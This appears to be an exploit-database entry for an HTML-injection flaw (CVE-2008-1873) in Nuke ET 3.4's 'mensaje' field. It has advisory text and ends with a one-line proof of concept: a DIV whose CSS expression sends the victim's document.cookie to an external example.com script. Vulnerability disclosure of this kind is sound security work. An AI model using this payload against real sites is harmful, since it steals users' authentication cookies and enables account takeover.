[] NeoSense

Nuke ET 3.4 - 'mensaje' HTML Injection

Author: Jose Luis Zayas
type: webapps
platform: php
port: 
date_added: 2008-04-04 
date_updated: 2014-02-12 
verified: 1 
codes: CVE-2008-1873;OSVDB-44016 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/28614/info

Nuke ET is prone to an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied input data. Attackers will likely require access to a user account to perform attacks.

Exploiting this issue may allow an attacker to execute HTML and script code in the context of the affected site, to steal cookie-based authentication credentials, or to control how the site is rendered to the user; other attacks are also possible.

Nuke ET 3.4 is vulnerable; other versions may also be affected.

<DIV
STYLE="width:expression(document.location='http://www.example.com/nuke/poc.php?cookie='+document.cookie);">